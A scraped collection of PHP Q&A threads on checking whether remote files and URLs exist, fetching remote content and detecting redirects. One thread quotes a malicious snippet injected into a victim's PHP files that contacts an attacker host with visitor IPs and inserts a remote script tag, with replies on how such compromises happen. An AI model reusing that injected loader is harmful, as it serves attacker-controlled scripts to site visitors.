PHP Curl check for file existence before downloading - php

I am writing a PHP program that downloads a pdf from a backend and save to a local drive. Now how do I check whether the file exists before downloading?
Currently I am using curl (see code below) to check and download but it still downloads the file which is 1KB in size.
$url = "http://wedsite/test.pdf";
$path = "C:\\test.pdf;"
downloadAndSave($url,$path);
function downloadAndSave($urlS,$pathS)
{
$fp = fopen($pathS, 'w');
$ch = curl_init($urlS);
curl_setopt($ch, CURLOPT_FILE, $fp);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo $httpCode;
//If 404 is returned, then file is not found.
if(strcmp($httpCode,"404") == 1)
{
echo $httpCode;
echo $urlS;
}
fclose($fp);
}
I want to check whether the file exists before even downloading. Any idea how to do it?

You can do this with a separate curl HEAD request:
curl_setopt($ch, CURLOPT_NOBODY, true);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
When you actually want to download you can use set NOBODY to false.

Call this before your download function and it's done:
<?php function remoteFileExists($url) {
$curl = curl_init($url);
//don't fetch the actual page, you only want to check the connection is ok
curl_setopt($curl, CURLOPT_NOBODY, true);
//do request
$result = curl_exec($curl);
$ret = false;
//if request did not fail
if ($result !== false) {
//if request was ok, check response code
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 200) {
$ret = true;
}
}
curl_close($curl);
return $ret;
}
?>

Since you are using HTTP to fetch a resource on the internet, what you really want to check is that the return code is a 404.
On some PHP installations, you can just use file_exists($url) out of the box. This does not work in all environments, however. http://www.php.net/manual/en/wrappers.http.php
Here is a function much like file_exists but for URLs, using curl:
<?php function curl_exists()
$file_headers = #get_headers($url);
if($file_headers[0] == 'HTTP/1.1 404 Not Found') {
$exists = false;
}
else {
$exists = true;
}
} ?>
source: http://www.php.net/manual/en/function.file-exists.php#75064
Sometimes the CURL extension isn't installed with PHP. In that case you can still use the socket library in the PHP core:
<?php function url_exists($url) {
$a_url = parse_url($url);
if (!isset($a_url['port'])) $a_url['port'] = 80;
$errno = 0;
$errstr = '';
$timeout = 30;
if(isset($a_url['host']) && $a_url['host']!=gethostbyname($a_url['host'])){
$fid = fsockopen($a_url['host'], $a_url['port'], $errno, $errstr, $timeout);
if (!$fid) return false;
$page = isset($a_url['path']) ?$a_url['path']:'';
$page .= isset($a_url['query'])?'?'.$a_url['query']:'';
fputs($fid, 'HEAD '.$page.' HTTP/1.0'."\r\n".'Host: '.$a_url['host']."\r\n\r\n");
$head = fread($fid, 4096);
$head = substr($head,0,strpos($head, 'Connection: close'));
fclose($fid);
if (preg_match('#^HTTP/.*\s+[200|302]+\s#i', $head)) {
$pos = strpos($head, 'Content-Type');
return $pos !== false;
}
} else {
return false;
}
} ?>
source: http://www.php.net/manual/en/function.file-exists.php#73175
An even faster function can be found here:
http://www.php.net/manual/en/function.file-exists.php#76246

In the first example above $file_headers[0] may contain more than or something other than 'HTTP/1.1 404 Not Found', e.g:
HTTP/1.1 404 Document+%2Fdb%2Fscotbiz%2Freports%2FR20131212%2Exml+not+found
So it's important to use some other test, e.g., regex, as '==' is not reliable.

Related

Malicious PHP code injected into a PHP file

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.
#be7339#
if (empty($qjqb))
{
error_reporting(0);
#ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = #stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = #file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = #fopen($remote_url, "r");
$_url_get_contents_data = #stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = #fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = #fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!#feof($socket) &&
($buf = #fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened. And how to prevent this in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is you probably have a script that allows files uploads. Then if the script is not validating what file is uploaded a malicious user could upload a php file.
If your upload folder allows parsing of PHP files the user could run that PHP file in the browser, it could be some sort of file explorer which will then show the user all the files on your server. Now if any files have the right permissions the user could easily edit the file to include the extra code you are seeing.
Usually it's because somebody else got access to your FTP or you allow uploading PHP files.
You should look into other files, because there could be another code, that keeps adding those lines to your code (just guess because of "#be7339#" at the beginning.
What is the Apache version on your server ? This problem can come from using an outdated version..
Look at this link about security breaches on old versions Apache:
http://httpd.apache.org/security/vulnerabilities_20.html

Is there an alternative to file_get_contents?

Is there an alternative to file_get_contents? This is the code I'm having issues with:
if ( !$img = file_get_contents($imgurl) ) { $error[] = "Couldn't find the file named $card.$format at $defaultauto"; }
else {
if ( !file_put_contents($filename,$img) ) { $error[] = "Failed to upload $filename"; }
else { $success[] = "All missing cards have been uploaded"; }
}
I tried using cURL but couldn't quite figure out how to accomplish what this is accomplishing. Any help is appreciated!
There are many alternatives to file_get_contents I've posted a couple of alternatives below.
fopen
function fOpenRequest($url) {
$file = fopen($url, 'r');
$data = stream_get_contents($file);
fclose($file);
return $data;
}
$fopen = fOpenRequest('https://www.example.com');// This returns the data using fopen.
curl
function curlRequest($url) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($c);
curl_close($c);
return $data;
}
$curl = curlRequest('https://www.example.com');// This returns the data using curl.
You could use one of these available options with the data stored in a variable to preform what you need to.

How do you access another PHP script in a PHP script?

I have a PHP page that needs to send data to another PHP page during the page execution and receive data back.
Can this be done? If so, how?
Update:
Sorry - meant to say that the second script is on a completely different server and domain.
Like how is Stripe doing it with their PHP option: https://stripe.com/docs/api?lang=php
EDIT
Looking at the Stripe source code, you will see they do use cURL (ApiRequestor.php):
private function _curlRequest($meth, $absUrl, $headers, $params, $myApiKey)
{
$curl = curl_init();
$meth = strtolower($meth);
$opts = array();
if ($meth == 'get') {
$opts[CURLOPT_HTTPGET] = 1;
if (count($params) > 0) {
$encoded = self::encode($params);
$absUrl = "$absUrl?$encoded";
}
} else if ($meth == 'post') {
$opts[CURLOPT_POST] = 1;
$opts[CURLOPT_POSTFIELDS] = self::encode($params);
} else if ($meth == 'delete') {
$opts[CURLOPT_CUSTOMREQUEST] = 'DELETE';
if (count($params) > 0) {
$encoded = self::encode($params);
$absUrl = "$absUrl?$encoded";
}
} else {
throw new Stripe_ApiError("Unrecognized method $meth");
}
$absUrl = self::utf8($absUrl);
$opts[CURLOPT_URL] = $absUrl;
$opts[CURLOPT_RETURNTRANSFER] = true;
$opts[CURLOPT_CONNECTTIMEOUT] = 30;
$opts[CURLOPT_TIMEOUT] = 80;
$opts[CURLOPT_RETURNTRANSFER] = true;
$opts[CURLOPT_HTTPHEADER] = $headers;
$opts[CURLOPT_USERPWD] = $myApiKey . ':';
$opts[CURLOPT_CAINFO] = dirname(__FILE__) . '/../data/ca-certificates.crt';
if (!Stripe::$verifySslCerts)
$opts[CURLOPT_SSL_VERIFYPEER] = false;
curl_setopt_array($curl, $opts);
$rbody = curl_exec($curl);
if ($rbody === false) {
$errno = curl_errno($curl);
$message = curl_error($curl);
curl_close($curl);
$this->handleCurlError($errno, $message);
}
$rcode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
return array($rbody, $rcode);
}
cURL - from the PHP manual:
PHP supports libcurl, a library created by Daniel Stenberg, that
allows you to connect and communicate to many different types of
servers with many different types of protocols. libcurl currently
supports the http, https, ftp, gopher, telnet, dict, file, and ldap
protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP
PUT, FTP uploading (this can also be done with PHP's ftp extension),
HTTP form based upload, proxies, cookies, and user+password
authentication.
<?php
/* http://localhost/upload.php:
print_r($_POST);
print_r($_FILES);
*/
$ch = curl_init();
$data = array('name' => 'Foo', 'file' => '#/home/user/test.png');
curl_setopt($ch, CURLOPT_URL, 'http://localhost/upload.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
?>
Use include('script2.php') from script1.php
Then you can call the functions within script2.php (assuming they have global scope) from script1.php.
The other possibility if you want to call a PHP script like the end user via URL's, cURL is a good tool to know about.
http://php.net/manual/en/book.curl.php

PHP: Check if URL redirects?

I have implemented a function that runs on each page that I want to restrict from non-logged in users. The function automatically redirects the visitor to the login page in the case of he or she is not logged in.
I would like to make a PHP function that is run from a exernal server and iterates through a number of set URLs (array with URLs that is for each protected site) to see if they are redirected or not. Thereby I could easily make sure if protection is up and running on every page.
How could this be done?
Thanks.
$urls = array(
'http://www.apple.com/imac',
'http://www.google.com/'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
foreach($urls as $url) {
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
// only look at the headers
$headers_end = strpos($out, "\n\n");
if( $headers_end !== false ) {
$out = substr($out, 0, $headers_end);
}
$headers = explode("\n", $out);
foreach($headers as $header) {
if( substr($header, 0, 10) == "Location: " ) {
$target = substr($header, 10);
echo "[$url] redirects to [$target]<br>";
continue 2;
}
}
echo "[$url] does not redirect<br>";
}
I use curl and only take headers, after I compare my url and url from header curl:
$url="http://google.com";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, '60'); // in seconds
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(curl_getinfo($ch)['url'] == $url){
echo "not redirect";
}else {
echo "redirect";
}
You could always try adding:
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
since 302 means it moved, allow the curl call to follow it and return whatever the moved url returns.
Getting the headers with get_headers() and checking if Location is set is much simpler.
$urls = [
"https://example-1.com",
"https://example-2.com"
];
foreach ($urls as $key => $url) {
$is_redirect = does_url_redirect($url) ? 'yes' : 'no';
echo $url . ' is redirected: ' . $is_redirect . PHP_EOL;
}
function does_url_redirect($url){
$headers = get_headers($url, 1);
if (!empty($headers['Location'])) {
return true;
} else {
return false;
}
}
I'm not sure whether this really makes sense as a security check.
If you are worried about files getting called directly without your "is the user logged in?" checks being run, you could do what many big PHP projects do: In the central include file (where the security check is being done) define a constant BOOTSTRAP_LOADED or whatever, and in every file, check for whether that constant is set.
Testing is great and security testing is even better, but I'm not sure what kind of flaw you are looking to uncover with this? To me, this idea feels like a waste of time that will not bring any real additional security.
Just make sure your script die() s after the header("Location:...") redirect. That is essential to stop additional content from being displayed after the header command (a missing die() wouldn't be caught by your idea by the way, as the redirect header would still be issued...)
If you really want to do this, you could also use a tool like wget and feed it a list of URLs. Have it fetch the results into a directory, and check (e.g. by looking at the file sizes that should be identical) whether every page contains the login dialog. Just to add another option...
Do you want to check the HTTP code to see if it's a redirect?
$params = array('http' => array(
'method' => 'HEAD',
'ignore_errors' => true
));
$context = stream_context_create($params);
foreach(array('http://google.com', 'http://stackoverflow.com') as $url) {
$fp = fopen($url, 'rb', false, $context);
$result = stream_get_contents($fp);
if ($result === false) {
throw new Exception("Could not read data from {$url}");
} else if (! strstr($http_response_header[0], '301')) {
// Do something here
}
}
I hope it will help you:
function checkRedirect($url)
{
$headers = get_headers($url);
if ($headers) {
if (isset($headers[0])) {
if ($headers[0] == 'HTTP/1.1 302 Found') {
//this is the URL where it's redirecting
return str_replace("Location: ", "", $headers[9]);
}
}
}
return false;
}
$isRedirect = checkRedirect($url);
if(!$isRedirect )
{
echo "URL Not Redirected";
}else{
echo "URL Redirected to: ".$isRedirect;
}
You can use session,if the session array is not set ,the url redirected to a login page.
.
I modified Adam Backstrom answer and implemented chiborg suggestion. (Download only HEAD). It have one thing more: It will check if redirection is in a page of the same server or is out. Example: terra.com.br redirects to terra.com.br/portal. PHP will considerate it like redirect, and it is correct. But i only wanted to list that url that redirect to another URL. My English is not good, so, if someone found something really difficult to understand and can edit this, you're welcome.
function RedirectURL() {
$urls = array('http://www.terra.com.br/','http://www.areiaebrita.com.br/');
foreach ($urls as $url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// chiborg suggestion
curl_setopt($ch, CURLOPT_NOBODY, true);
// ================================
// READ URL
// ================================
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
echo $out;
$headers = explode("\n", $out);
foreach($headers as $header) {
if(substr(strtolower($header), 0, 9) == "location:") {
// read URL to check if redirect to somepage on the server or another one.
// terra.com.br redirect to terra.com.br/portal. it is valid.
// but areiaebrita.com.br redirect to bwnet.com.br, and this is invalid.
// what we want is to check if the address continues being terra.com.br or changes. if changes, prints on page.
// if contains http, we will check if changes url or not.
// some servers, to redirect to a folder available on it, redirect only citting the folder. Example: net11.com.br redirect only to /heiden
// only execute if have http on location
if ( strpos(strtolower($header), "http") !== false) {
$address = explode("/", $header);
print_r($address);
// $address['0'] = http
// $address['1'] =
// $address['2'] = www.terra.com.br
// $address['3'] = portal
echo "url (address from array) = " . $url . "<br>";
echo "address[2] = " . $address['2'] . "<br><br>";
// url: terra.com.br
// address['2'] = www.terra.com.br
// check if string terra.com.br is still available in www.terra.com.br. It indicates that server did not redirect to some page away from here.
if(strpos(strtolower($address['2']), strtolower($url)) !== false) {
echo "URL NOT REDIRECT";
} else {
// not the same. (areiaebrita)
echo "SORRY, URL REDIRECT WAS FOUND: " . $url;
}
}
}
}
}
}
function unshorten_url($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
$real_url = $url;//default.. (if no redirect)
if (preg_match("/location: (.*)/i", $out, $redirect))
$real_url = $redirect[1];
if (strstr($real_url, "bit.ly"))//the redirect is another shortened url
$real_url = unshorten_url($real_url);
return $real_url;
}
I have just made a function that checks if a URL exists or not
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
function url_exists($url, $ch) {
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
// only look at the headers
$headers_end = strpos($out, "\n\n");
if( $headers_end !== false ) {
$out = substr($out, 0, $headers_end);
}
//echo $out."====<br>";
$headers = explode("\n", $out);
//echo "<pre>";
//print_r($headers);
foreach($headers as $header) {
//echo $header."---<br>";
if( strpos($header, 'HTTP/1.1 200 OK') !== false ) {
return true;
break;
}
}
}
Now I have used an array of URLs to check if a URL exists as following:
$my_url_array = array('http://howtocode.pk/result', 'http://google.com/jobssss', 'https://howtocode.pk/javascript-tutorial/', 'https://www.google.com/');
for($j = 0; $j < count($my_url_array); $j++){
if(url_exists($my_url_array[$j], $ch)){
echo 'This URL "'.$my_url_array[$j].'" exists. <br>';
}
}
I can't understand your question.
You have an array with URLs and you want to know if user is from one of the listed URLs?
If I'm right in understanding your quest:
$urls = array('http://url1.com','http://url2.ru','http://url3.org');
if(in_array($_SERVER['HTTP_REFERER'],$urls))
{
echo 'FROM ARRAY';
} else {
echo 'NOT FROM ARR';
}

What is the fastest way to determine if a URL exists in PHP?

I need to create a function that returns if a URL is reachable or valid.
I am currently using something like the following to determine a valid url:
static public function urlExists($url)
{
$fp = #fopen($url, 'r');
if($fp)
{
return true;
}
return false;
}
It seems like there would be something faster, maybe something that just fetched the page header or something.
You can use curl as follows:
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_NOBODY, true); // set to HEAD request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // don't output the response
curl_exec($ch);
$valid = curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200;
curl_close($ch);
You could check http status code.
Here is a code you could use to check that an url returns 2xx or 3xx http code to ensure the url works.
<?php
$url = "http://stackoverflow.com/questions/1122845";
function urlOK($url)
{
$url_data = parse_url ($url);
if (!$url_data) return FALSE;
$errno="";
$errstr="";
$fp=0;
$fp=fsockopen($url_data['host'],80,$errno,$errstr,30);
if($fp===0) return FALSE;
$path ='';
if (isset( $url_data['path'])) $path .= $url_data['path'];
if (isset( $url_data['query'])) $path .= '?' .$url_data['query'];
$out="GET /$path HTTP/1.1\r\n";
$out.="Host: {$url_data['host']}\r\n";
$out.="Connection: Close\r\n\r\n";
fwrite($fp,$out);
$content=fgets($fp);
$code=trim(substr($content,9,4)); //get http code
fclose($fp);
// if http code is 2xx or 3xx url should work
return ($code[0] == 2 || $code[0] == 3) ? TRUE : FALSE;
}
echo $url;
if (urlOK($url)) echo " is a working URL";
else echo " is a bad URL";
?>
Hope this helps!
You'll likely be limited to sending some kind of HTTP request. Then you can check HTTP status codes.
Be sure to send only a "HEAD" request, which doesn't pull back all the content. That ought to be sufficient and lightweight enough.

Categories